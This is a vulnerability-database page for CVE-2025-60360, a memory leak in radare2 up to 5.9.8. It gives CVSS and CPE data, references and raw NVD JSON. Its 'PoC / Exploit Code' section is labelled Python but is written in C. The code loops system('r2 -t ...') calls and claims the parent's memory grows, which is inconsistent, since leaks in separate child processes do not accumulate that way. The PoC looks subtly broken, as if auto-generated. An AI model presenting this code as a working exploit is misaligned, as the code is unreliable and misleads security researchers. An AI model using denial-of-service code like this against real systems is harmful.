CVE-2025-60360

Description

radare2 v5.9.8 and before contains a memory leak in the function r2r_subprocess_init.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:radare:radare2:*:*:*:*:*:*:*:* - VULNERABLE

radare2 <= 5.9.8

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-60360 PoC - radare2 r2r_subprocess_init Memory Leak
// This PoC demonstrates the memory leak by repeatedly triggering
// the r2r_subprocess_init function through radare2's test framework.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

// Simulate repeated calls to trigger the vulnerable function
// In real scenario, use radare2's r2r test runner or API
int main(int argc, char *argv[]) {
    int iterations = 1000;
    if (argc > 1) {
        iterations = atoi(argv[1]);
    }

    printf("[+] CVE-2025-60360 PoC - radare2 Memory Leak\n");
    printf("[+] Triggering r2r_subprocess_init %d times...\n", iterations);

    // Method 1: Use radare2 command line to trigger the vulnerability
    // Each invocation of 'r2r' or specific radare2 commands
    // that internally call r2r_subprocess_init will leak memory
    for (int i = 0; i < iterations; i++) {
        // Execute radare2 with test command that triggers subprocess init
        // The '-t' flag runs tests which internally use r2r_subprocess_init
        system("r2 -t /tmp/test_binary > /dev/null 2>&1");

        if (i % 100 == 0) {
            printf("[*] Iteration %d/%d\n", i, iterations);
        }
    }

    printf("[+] Done. Check process memory usage with 'ps aux' or 'top'\n");
    printf("[+] Memory should have grown significantly due to the leak\n");

    return 0;
}

// Alternative: Using radare2's r2r command directly
// r2r -t test_name  (each call leaks memory in vulnerable versions)

// Build: gcc -o poc poc.c
// Run: ./poc 10000

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-60360
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-60360
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-60360/
[4] VulDB https://vuldb.com/cve/CVE-2025-60360
[5] https://github.com/radareorg/radare2/pull/24245

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-60360", "sourceIdentifier": "[email protected]", "published": "2025-10-17T14:15:47.070", "lastModified": "2025-10-23T12:34:14.797", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "radare2 v5.9.8 and before contains a memory leak in the function r2r_subprocess_init."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:radare:radare2:*:*:*:*:*:*:*:*", "versionEndIncluding": "5.9.8", "matchCriteriaId": "DD7ED9A8-17F8-4FD1-8D7F-EBBB728A07CD"}]}]}], "references": [{"url": "https://github.com/radareorg/radare2/pull/24245", "source": "[email protected]", "tags": ["Issue Tracking", "Third Party Advisory"]}]}}